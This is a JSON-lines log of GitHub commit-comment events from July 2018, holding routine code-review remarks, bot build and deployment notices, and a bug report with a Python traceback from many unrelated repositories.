{"id":"7946264300","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Todo"},"payload":{"comment":{"id":29662660,"position":null,"line":null,"path":null,"commit_id":"05b6005a62ade95e7985b7c1f388a8ff5f41f70a","created_at":"2018-07-10T20:43:52Z","updated_at":"2018-07-10T20:43:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display todo list](https://trello.com/c/RJC1IWKT/4-display-todo-list)"}},"created_at":"2018-07-10T20:43:52Z"}
{"id":"7946264486","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662662,"position":37,"line":40,"path":"week-08/Day-02/Todo/Todo/Controllers/TodoController.cs","commit_id":"f98a400be5e940b27b62a0071e2531fff4005c23","created_at":"2018-07-10T20:43:54Z","updated_at":"2018-07-10T20:43:54Z","author_association":"NONE","body":"does it make any difference is use `camelCase` here or not? I mean:\r\n- `[HttpPost(\"changeUrgent\")]`\r\n- `[HttpPost(\"changeurgent\")]`\r\n- `[HttpPost(\"ChangeUrgent\")]`\r\nthese routes are the same or not?"}},"created_at":"2018-07-10T20:43:54Z"}
{"id":"7946264564","type":"CommitCommentEvent","actor":{"login":"jawalek"},"repo":{"name":"jawalek/recommendationSystem"},"payload":{"comment":{"id":29662665,"position":null,"line":null,"path":null,"commit_id":"6a778abe19755b8887d308ce1314e198a8c86d56","created_at":"2018-07-10T20:43:55Z","updated_at":"2018-07-10T20:43:55Z","author_association":"OWNER","body":"Categories present to be searched"}},"created_at":"2018-07-10T20:43:55Z"}
{"id":"7946266379","type":"CommitCommentEvent","actor":{"login":"JiachengXu"},"repo":{"name":"gokberkkaraca/zlint"},"payload":{"comment":{"id":29662666,"position":null,"line":null,"path":null,"commit_id":"06ff1ee9d834824894208cac1c04ebd396dde961","created_at":"2018-07-10T20:44:17Z","updated_at":"2018-07-10T20:44:17Z","author_association":"NONE","body":"Hey Gokberk,  How are you doing now?  Start to write some Go code? Actually you shouldn't do the renaming stuff, instead, you should keep it in `zmap` folder and add remote origin to your forked repo(i.e., using your forked repo URL as origin), and add maybe `upstream` for the original repo using for rebasing.  Golang is a good language, enjoy it!"}},"created_at":"2018-07-10T20:44:17Z"}
{"id":"7946266675","type":"CommitCommentEvent","actor":{"login":"drobilla"},"repo":{"name":"drobilla/lilv"},"payload":{"comment":{"id":29662668,"position":null,"line":null,"path":null,"commit_id":"5e80e165754064e9942fdf7bd3449a9f4fa047a0","created_at":"2018-07-10T20:44:21Z","updated_at":"2018-07-10T20:44:21Z","author_association":"OWNER","body":"Why is there a need to remove it?  It will create a new one.\r\n\r\nYou are assuming the old link is known to actually be the file that this save should refer to, but that's not necessarily the case.  It makes a _new_ link, which is always what happens here unless an existing good link is found to reuse.\r\n\r\nIt's easily possible for such a link to definitely _not_ be the file:\r\n\r\n * Plugin 1 saves `externals/kick.wav.1 => /kit1/kick.wav`\r\n * Plugin 2 saves `externals/kick.wav.2 => /kit2/kick.wav`\r\n * User unmounts/removes/etc /kit1\r\n * Plugin 2 saves again, the search finds the broken `externals/kick.wav.1`, **deletes it** (as in your patch) and points it to `kit2/kick.wav`\r\n * User remounts/undeletes/etc /kit1\r\n * Plugin 1 state has now been irreperably destroyed and refers to the wrong file"}},"created_at":"2018-07-10T20:44:21Z"}
{"id":"7946266677","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662667,"position":68,"line":67,"path":"week-08/Day-02/Todo/Todo/Controllers/TodoController.cs","commit_id":"f98a400be5e940b27b62a0071e2531fff4005c23","created_at":"2018-07-10T20:44:20Z","updated_at":"2018-07-10T20:44:20Z","author_association":"NONE","body":"I do miss a new line here :("}},"created_at":"2018-07-10T20:44:20Z"}
{"id":"7946268618","type":"CommitCommentEvent","actor":{"login":"dorbin"},"repo":{"name":"spinnaker/spinnaker.github.io"},"payload":{"comment":{"id":29662670,"position":6,"line":58,"path":"setup/install/providers/kubernetes-v2/aws-eks.md","commit_id":"75cc4586f92c1145ae980aeb28d6c69c25624dc5","created_at":"2018-07-10T20:44:44Z","updated_at":"2018-07-10T20:44:44Z","author_association":"CONTRIBUTOR","body":"How about...\r\n\"Ensure `kubectl` and `heptio authenticator` for AWS are installed and configured...\""}},"created_at":"2018-07-10T20:44:44Z"}
{"id":"7946269664","type":"CommitCommentEvent","actor":{"login":"jawalek"},"repo":{"name":"jawalek/recommendationSystem"},"payload":{"comment":{"id":29662671,"position":null,"line":null,"path":null,"commit_id":"493ee1e35db45d947eaaa391a621bdf067d8935f","created_at":"2018-07-10T20:44:56Z","updated_at":"2018-07-10T20:44:56Z","author_association":"OWNER","body":"Data to be used"}},"created_at":"2018-07-10T20:44:56Z"}
{"id":"7946269678","type":"CommitCommentEvent","actor":{"login":"jperrin"},"repo":{"name":"CentOS/CentOS-Dockerfiles"},"payload":{"comment":{"id":29662672,"position":null,"line":null,"path":null,"commit_id":"bb7542b9f6e911f962e4fad2753b3d55060ce081","created_at":"2018-07-10T20:44:56Z","updated_at":"2018-07-10T20:44:56Z","author_association":"MEMBER","body":"Looking at the whole spec file, I don't see where the caddy binary actually comes from? how are you generating that? "}},"created_at":"2018-07-10T20:44:56Z"}
{"id":"7946270042","type":"CommitCommentEvent","actor":{"login":"daboe01"},"repo":{"name":"cappuccino/cappuccino"},"payload":{"comment":{"id":29662674,"position":null,"line":null,"path":null,"commit_id":"5bfafaf241a4789d4fe143efbbc657faddb0c0f8","created_at":"2018-07-10T20:45:00Z","updated_at":"2018-07-10T20:45:00Z","author_association":"CONTRIBUTOR","body":"@mrcarlberg i do not know why, but this one seems to break text sizing. most likely we need the cpdontremove class for some reasons i do not understand. could you please revert this one? i will prepare a fixed version without removing the cpdontremove class."}},"created_at":"2018-07-10T20:45:00Z"}
{"id":"7946271325","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/zynori"},"payload":{"comment":{"id":29662681,"position":null,"line":null,"path":null,"commit_id":"f98a400be5e940b27b62a0071e2531fff4005c23","created_at":"2018-07-10T20:45:16Z","updated_at":"2018-07-10T20:45:16Z","author_association":"NONE","body":"feedback for `ToDoController.cs`: the whole backend endpoint skeleton looks good, the routes are OK, you use Get and Post where it is needed, nice"}},"created_at":"2018-07-10T20:45:16Z"}
{"id":"7946271583","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29662683,"position":null,"line":null,"path":null,"commit_id":"bc25c98f4673e69078bd67b9d83bfd3f9aa954dd","created_at":"2018-07-10T20:45:19Z","updated_at":"2018-07-10T20:45:19Z","author_association":"NONE","body":"Good point to\r\n```sql\r\nDELETE FROM `skinning_loot_template`  WHERE `entry` IN (9198);\r\n```\r\nI wonder if the same should have been done for Bijou (`10257`)."}},"created_at":"2018-07-10T20:45:19Z"}
{"id":"7946274833","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662689,"position":2,"line":1,"path":".gitignore","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:45:58Z","updated_at":"2018-07-10T20:45:58Z","author_association":"OWNER","body":"верни как было"}},"created_at":"2018-07-10T20:45:58Z"}
{"id":"7946275500","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29662691,"position":21,"line":21,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T20:46:07Z","updated_at":"2018-07-10T20:46:07Z","author_association":"OWNER","body":"не правильно понял тз, потом это комментарий :("}},"created_at":"2018-07-10T20:46:07Z"}
{"id":"7946275540","type":"CommitCommentEvent","actor":{"login":"ElvishJerricco"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29662692,"position":5,"line":76,"path":"pkgs/top-level/haskell-packages.nix","commit_id":"c85f23a82a6ae9a5b38a789897e455b11983e528","created_at":"2018-07-10T20:46:07Z","updated_at":"2018-07-10T20:46:07Z","author_association":"CONTRIBUTOR","body":"@peti Darn. It's really nice that all the other GHCs are built by `Binary` versions. Can GHC 8.4 be used to build GHC 8.2? Maybe we can just replace `ghc821Binary` with `ghc841Binary`."}},"created_at":"2018-07-10T20:46:07Z"}
{"id":"7946278144","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29662697,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-10T20:46:39Z","updated_at":"2018-07-10T20:46:39Z","author_association":"OWNER","body":"Ah - the check in playGame should have been on refundAllowedAt==0, not !refunded"}},"created_at":"2018-07-10T20:46:39Z"}
{"id":"7946278751","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662700,"position":7,"line":488,"path":"assets/sass/common/_reboot.sass","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:46:46Z","updated_at":"2018-07-10T20:46:46Z","author_association":"OWNER","body":"такие вещи лучше выносить в отдельный файл, в папку `blocks` и уже оттуда подключать в `index.sass`"}},"created_at":"2018-07-10T20:46:46Z"}
{"id":"7946281689","type":"CommitCommentEvent","actor":{"login":"fir3pho3nixx"},"repo":{"name":"fir3pho3nixx/Windsor"},"payload":{"comment":{"id":29662704,"position":8,"line":33,"path":".gitignore","commit_id":"efcdb64000d116c11e912e4ab12ef959756f2256","created_at":"2018-07-10T20:47:22Z","updated_at":"2018-07-10T20:47:22Z","author_association":"OWNER","body":"Should probably reduce these to just `tools/`"}},"created_at":"2018-07-10T20:47:22Z"}
{"id":"7946282141","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29662706,"position":113,"line":113,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-10T20:47:28Z","updated_at":"2018-07-10T20:47:28Z","author_association":"OWNER","body":"a mapping of addresses to owed amounts (outside the game struct) would serve this purpose"}},"created_at":"2018-07-10T20:47:28Z"}
{"id":"7946283088","type":"CommitCommentEvent","actor":{"login":"kyleplo"},"repo":{"name":"UltraLang/UltraLangScript"},"payload":{"comment":{"id":29662707,"position":null,"line":null,"path":null,"commit_id":"e0ebbb150cc48c8b0bafb4e8f34b9d6a110e0972","created_at":"2018-07-10T20:47:39Z","updated_at":"2018-07-10T20:47:39Z","author_association":"MEMBER","body":"2 things @amazinigmech2418:\r\n* We want Objectify in a separate file titled `objects.js`\r\n* Please create branches in amaziningmech2418/UltraLangScript , not UltraLang/UltraLangScript"}},"created_at":"2018-07-10T20:47:39Z"}
{"id":"7946284051","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29662708,"position":null,"line":null,"path":null,"commit_id":"47dfa4cad6592787217e1d0d2885f3992fdc3856","created_at":"2018-07-10T20:47:51Z","updated_at":"2018-07-10T20:47:51Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T20:47:51Z"}
{"id":"7946284297","type":"CommitCommentEvent","actor":{"login":"DeqingQu"},"repo":{"name":"RTXteam/RTX"},"payload":{"comment":{"id":29662709,"position":null,"line":null,"path":null,"commit_id":"663b3f3c4cc22d8ecbf9a0cb1b75f805953579dc","created_at":"2018-07-10T20:47:55Z","updated_at":"2018-07-10T20:47:55Z","author_association":"MEMBER","body":"@flashkicker Can you use QueryBioLink.get_label_for_disease and QueryBioLink.get_label_for_phenotype to query the label of a disease or a phenotype? "}},"created_at":"2018-07-10T20:47:55Z"}
{"id":"7946291215","type":"CommitCommentEvent","actor":{"login":"camrun91"},"repo":{"name":"phareous/insteonlocal"},"payload":{"comment":{"id":29662719,"position":null,"line":null,"path":null,"commit_id":"a4544a17d143fb285852cb873e862c270d55dd00","created_at":"2018-07-10T20:49:14Z","updated_at":"2018-07-10T20:49:14Z","author_association":"COLLABORATOR","body":"I have been using what you had for a while and have been happy with it. I do not use the home assistant front end much so the little bugs do not bother me. \r\n"}},"created_at":"2018-07-10T20:49:14Z"}
{"id":"7946293186","type":"CommitCommentEvent","actor":{"login":"Killyana"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29662722,"position":null,"line":null,"path":null,"commit_id":"bc25c98f4673e69078bd67b9d83bfd3f9aa954dd","created_at":"2018-07-10T20:49:37Z","updated_at":"2018-07-10T20:49:37Z","author_association":"MEMBER","body":"No 10257 is used by other npcs"}},"created_at":"2018-07-10T20:49:37Z"}
{"id":"7946294341","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29662727,"position":null,"line":null,"path":null,"commit_id":"f4d8a97077f1517594deb8f0b074bac3fa5ec323","created_at":"2018-07-10T20:49:50Z","updated_at":"2018-07-10T20:49:50Z","author_association":"NONE","body":"If you need something aks for it my friend :)\r\nIf you ask for it and you did not get what you need to continue working give a feedback to the fuc*er 🗡\r\nIf you still stuck you can call Mark 🗡\r\nBut for real, unfortunately I am not reading commit messages too often, but I hope once you come to ask help from mentor you got what you need. If I am not right tell me :)"}},"created_at":"2018-07-10T20:49:50Z"}
{"id":"7946294755","type":"CommitCommentEvent","actor":{"login":"sausagelab"},"repo":{"name":"sausagelab/purevpn-pptp-scatter"},"payload":{"comment":{"id":29662728,"position":null,"line":null,"path":null,"commit_id":"235fdac22f82b56d00f4c6ed1bb89bc956e6c9f2","created_at":"2018-07-10T20:49:55Z","updated_at":"2018-07-10T20:49:55Z","author_association":"OWNER","body":"Had to remove shuf and replace with sort -r"}},"created_at":"2018-07-10T20:49:55Z"}
{"id":"7946295231","type":"CommitCommentEvent","actor":{"login":"DeqingQu"},"repo":{"name":"RTXteam/RTX"},"payload":{"comment":{"id":29662730,"position":null,"line":null,"path":null,"commit_id":"663b3f3c4cc22d8ecbf9a0cb1b75f805953579dc","created_at":"2018-07-10T20:50:00Z","updated_at":"2018-07-10T20:50:00Z","author_association":"MEMBER","body":"@flashkicker BTW, can you also rollback QueryEBIOLSExtended.py, because QueryEBIOLSExtended.get_disease_description and QueryEBIOLSExtended.get_phenotype_description  are designed to query descriptions and are used by other functions somewhere else."}},"created_at":"2018-07-10T20:50:00Z"}
{"id":"7946297564","type":"CommitCommentEvent","actor":{"login":"efogarty11"},"repo":{"name":"merenlab/anvio"},"payload":{"comment":{"id":29662733,"position":null,"line":null,"path":null,"commit_id":"6358752cbdaecd534aa399c33235b57a8dcad0b5","created_at":"2018-07-10T20:50:26Z","updated_at":"2018-07-10T20:50:26Z","author_association":"NONE","body":"Sorry I couldn't delete all the beginning text :( \r\n\r\n(anvio-master) [efogarty@barhal-01 SAMPLES-MERGED_kraken_CHI0054]$ anvi-self-test --version\r\nAnvi'o version ...............................: margaret (v5.1-master)\r\nProfile DB version ...........................: 29\r\nContigs DB version ...........................: 12\r\nPan DB version ...............................: 12\r\nGenome data storage version ..................: 6\r\nAuxiliary data storage version ...............: 2\r\nStructure DB version .........................: 1\r\n\r\nI was trying to visualize merged profile databases after adding kraken data but this error came up:\r\n\r\n(anvio-master) [efogarty@barhal-01 GLOBALmg_PLASMIDS]$ anvi-interactive -p /groups/merenlab/00_PROJECTS/GUT_PLASMIDS/GLOBALmg_PLASMIDS/06_MERGED_kraken/SAMPLES-MERGED_kraken_CHI0054/PROFILE.db -c /groups/merenlab/00_PROJECTS/GUT_PLASMIDS/GLOBALmg_PLASMIDS/03_CONTIGS/CHI0054_updated_plasmid_May_08_18-contigs.db\r\nContigs DB ...................................: Initialized: /groups/merenlab/00_PROJECTS/GUT_PLASMIDS/GLOBALmg_PLASMIDS/03_CONTIGS/CHI0054_updated_plasmid_May_08_18-contigs.db (v. 12)\r\nInteractive mode .............................: full\r\n[10 Jul 18 16:33:01 Initializing the profile database superclass] Loading split names                                                                                                                                                                                                            Traceback (most recent call last):\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/bin/anvi-interactive\", line 100, in <module>\r\n    d = interactive.Interactive(args)\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/interactive.py\", line 189, in __init__\r\n    self.load_full_mode()\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/interactive.py\", line 885, in load_full_mode\r\n    ProfileSuperclass.__init__(self, self.args)\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/dbops.py\", line 1999, in __init__\r\n    self.split_names = utils.get_all_item_names_from_the_database(self.profile_db_path)\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/utils.py\", line 2105, in get_all_item_names_from_the_database\r\n    all_items = set(database.get_single_column_from_table('mean_coverage_Q2Q3_splits', 'contig'))\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/db.py\", line 288, in get_single_column_from_table\r\n    response = self._exec('''SELECT %s %s FROM %s''' % ('DISTINCT' if unique else '', column, table))\r\n  File \"/groups/merenlab/virtual-envs/anvio-master/anvio/anvio/db.py\", line 176, in _exec\r\n    ret_val = self.cursor.execute(sql_query)\r\nsqlite3.OperationalError: no such table: mean_coverage_Q2Q3_splits\r\n\r\nThank you :D \r\n\r\n"}},"created_at":"2018-07-10T20:50:26Z"}
{"id":"7946297650","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662734,"position":2,"line":1,"path":".gitignore","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:50:27Z","updated_at":"2018-07-10T20:50:27Z","author_association":"OWNER","body":"да и вообще в гитигнор лучше не лезь, тут всё настроено и работает как надо"}},"created_at":"2018-07-10T20:50:27Z"}
{"id":"7946298530","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/jakabus"},"payload":{"comment":{"id":29662736,"position":24,"line":27,"path":"week-08/day-02/ListingTodos/ListingTodos/Controllers/TodoController.cs","commit_id":"7708c90e431b927016583046899ac5e5801317e5","created_at":"2018-07-10T20:50:37Z","updated_at":"2018-07-10T20:50:37Z","author_association":"NONE","body":"I am happy to see that :)"}},"created_at":"2018-07-10T20:50:37Z"}
{"id":"7946298906","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29662737,"position":null,"line":null,"path":null,"commit_id":"c2706355a24df2388732a3da909e9f6aa7e04aa9","created_at":"2018-07-10T20:50:41Z","updated_at":"2018-07-10T20:50:41Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-22](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-22-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-10T20:50:41Z"}
{"id":"7946299999","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29662740,"position":null,"line":null,"path":null,"commit_id":"4fa7a0e2debed98d78630644e2b3acae376275cd","created_at":"2018-07-10T20:50:54Z","updated_at":"2018-07-10T20:50:54Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-454](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-454).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-454-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T20:50:54Z"}
{"id":"7946302387","type":"CommitCommentEvent","actor":{"login":"flashkicker"},"repo":{"name":"RTXteam/RTX"},"payload":{"comment":{"id":29662745,"position":null,"line":null,"path":null,"commit_id":"663b3f3c4cc22d8ecbf9a0cb1b75f805953579dc","created_at":"2018-07-10T20:51:21Z","updated_at":"2018-07-10T20:51:21Z","author_association":"MEMBER","body":"Yes, of course!"}},"created_at":"2018-07-10T20:51:21Z"}
{"id":"7946303243","type":"CommitCommentEvent","actor":{"login":"joaompinto"},"repo":{"name":"mdatapipe/mdatapipe"},"payload":{"comment":{"id":29662748,"position":null,"line":null,"path":null,"commit_id":"e1e692d8c95377064591588de37b7af82f9d9870","created_at":"2018-07-10T20:51:31Z","updated_at":"2018-07-10T20:51:31Z","author_association":"CONTRIBUTOR","body":"Did a major clean-up to the code, make sure you \"git pull\" before changing it again :)"}},"created_at":"2018-07-10T20:51:31Z"}
{"id":"7946305190","type":"CommitCommentEvent","actor":{"login":"teaguru"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662752,"position":7,"line":488,"path":"assets/sass/common/_reboot.sass","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:51:54Z","updated_at":"2018-07-10T20:51:54Z","author_association":"COLLABORATOR","body":"урок был где чувак прям в ребуте херачил, паленёй значит))\r\n"}},"created_at":"2018-07-10T20:51:54Z"}
{"id":"7946306130","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29662754,"position":3,"line":3,"path":"interpretation/polls.py","commit_id":"252536e39bce6c8b1b65b203be27613f45304d9a","created_at":"2018-07-10T20:52:06Z","updated_at":"2018-07-10T20:52:06Z","author_association":"COLLABORATOR","body":"UGH! Why did it merge these files as well? These aren't even finished yet!"}},"created_at":"2018-07-10T20:52:06Z"}
{"id":"7946308587","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662762,"position":null,"line":null,"path":null,"commit_id":"e60b1836e75a358de12f0228bace92fa54861a95","created_at":"2018-07-10T20:52:35Z","updated_at":"2018-07-10T20:52:35Z","author_association":"NONE","body":"`feat(TransparencyTest)addTodo` like what is TransparencyTest? One commit should contaion only one minor change in the code, and when I read it I should know what was it"}},"created_at":"2018-07-10T20:52:35Z"}
{"id":"7946309486","type":"CommitCommentEvent","actor":{"login":"Wicker0"},"repo":{"name":"BeeStation/BeeStation"},"payload":{"comment":{"id":29662763,"position":null,"line":null,"path":null,"commit_id":"485bf46f76ca0d91fe5617aac84af0369b95031e","created_at":"2018-07-10T20:52:44Z","updated_at":"2018-07-10T20:52:44Z","author_association":"NONE","body":"OwO"}},"created_at":"2018-07-10T20:52:44Z"}
{"id":"7946310645","type":"CommitCommentEvent","actor":{"login":"kadirildeniz"},"repo":{"name":"huseyinalan/youtubeCroper"},"payload":{"comment":{"id":29662765,"position":1,"line":1,"path":"youtubeCrop/Deneme.md","commit_id":"683084b657af9aea869ff6c273665c5fad71207f","created_at":"2018-07-10T20:52:58Z","updated_at":"2018-07-10T20:52:58Z","author_association":"NONE","body":"bence de"}},"created_at":"2018-07-10T20:52:58Z"}
{"id":"7946311284","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"danildanil86660/CPP2018"},"payload":{"comment":{"id":29662767,"position":null,"line":null,"path":null,"commit_id":"d9d646dec8542d7faa19bd8976b4193b7960b75d","created_at":"2018-07-10T20:53:07Z","updated_at":"2018-07-10T20:53:07Z","author_association":"NONE","body":"10/10."}},"created_at":"2018-07-10T20:53:07Z"}
{"id":"7946312829","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662772,"position":7,"line":488,"path":"assets/sass/common/_reboot.sass","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:53:24Z","updated_at":"2018-07-10T20:53:24Z","author_association":"OWNER","body":"ну он либо не очень умный, либо правил стили ребута"}},"created_at":"2018-07-10T20:53:24Z"}
{"id":"7946314850","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"fedhakim/CPP2018"},"payload":{"comment":{"id":29662777,"position":null,"line":null,"path":null,"commit_id":"620698fb0ffe5904fcf5c6ebda3477dcec016f1e","created_at":"2018-07-10T20:53:50Z","updated_at":"2018-07-10T20:53:50Z","author_association":"NONE","body":"Currently 3/10."}},"created_at":"2018-07-10T20:53:50Z"}
{"id":"7946315051","type":"CommitCommentEvent","actor":{"login":"gokberkkaraca"},"repo":{"name":"gokberkkaraca/zlint"},"payload":{"comment":{"id":29662778,"position":null,"line":null,"path":null,"commit_id":"06ff1ee9d834824894208cac1c04ebd396dde961","created_at":"2018-07-10T20:53:52Z","updated_at":"2018-07-10T20:53:52Z","author_association":"OWNER","body":"Hey, thank you for your suggestion! I have just started to modify a tool written in Golang but I am not familiar with the language :) I could not understand how imports are working actually, I renamed the imports because I want the modified files to be used, which will be in my forked repository. If I keep them instead of renaming, wouldn't it import the old files from the original repository?"}},"created_at":"2018-07-10T20:53:52Z"}
{"id":"7946316965","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662780,"position":1,"line":1,"path":"week-09/ListingToDos/ListingToDos/Views/Home/TransparencyTest.html","commit_id":"e60b1836e75a358de12f0228bace92fa54861a95","created_at":"2018-07-10T20:54:15Z","updated_at":"2018-07-10T20:54:15Z","author_association":"NONE","body":"okay, now I at least know what TransparencyTest is :D\r\nalso the frontend part of the exam should not be a problem for you, you made great progress"}},"created_at":"2018-07-10T20:54:15Z"}
{"id":"7946317338","type":"CommitCommentEvent","actor":{"login":"micxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29662782,"position":33,"line":33,"path":"String Compression.js","commit_id":"13d71f2cad305e030c0e59f65e182a25269b80f7","created_at":"2018-07-10T20:54:20Z","updated_at":"2018-07-10T20:54:20Z","author_association":"OWNER","body":"btw I added more test cases for edge cases on a later commit, in case you were thinking i did not add enough tests"}},"created_at":"2018-07-10T20:54:20Z"}
{"id":"7946318309","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"Khodeeva/CPP2018"},"payload":{"comment":{"id":29662785,"position":null,"line":null,"path":null,"commit_id":"c4d48334856445b853e43d8b9c8299f1d1857ef2","created_at":"2018-07-10T20:54:33Z","updated_at":"2018-07-10T20:54:33Z","author_association":"NONE","body":"Currently 3/10."}},"created_at":"2018-07-10T20:54:33Z"}
{"id":"7946319879","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662791,"position":null,"line":null,"path":null,"commit_id":"c019d02f106a0ff1d397554916e7be4f690e6cad","created_at":"2018-07-10T20:54:52Z","updated_at":"2018-07-10T20:54:52Z","author_association":"NONE","body":"same whit the commit thing, too much stuff in one commit "}},"created_at":"2018-07-10T20:54:52Z"}
{"id":"7946320764","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662793,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T20:55:03Z","updated_at":"2018-07-10T20:55:03Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T20:55:03Z"}
{"id":"7946320850","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662794,"position":32,"line":32,"path":"StockMarket/Services/StockMarketService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:55:04Z","updated_at":"2018-07-10T20:55:04Z","author_association":"NONE","body":"I would move the content of the PriceAnalyzerService to this service and remove PriceAnalyzerService from the project. Mind that AnalyzeDays method returns the same dto as AnalyzeMonth so even maybe you should merge those two methods into one. If the newly created method looks too clunky or too long you can think about splitting it into smaller parts; private methods but there must be a reason for that. "}},"created_at":"2018-07-10T20:55:04Z"}
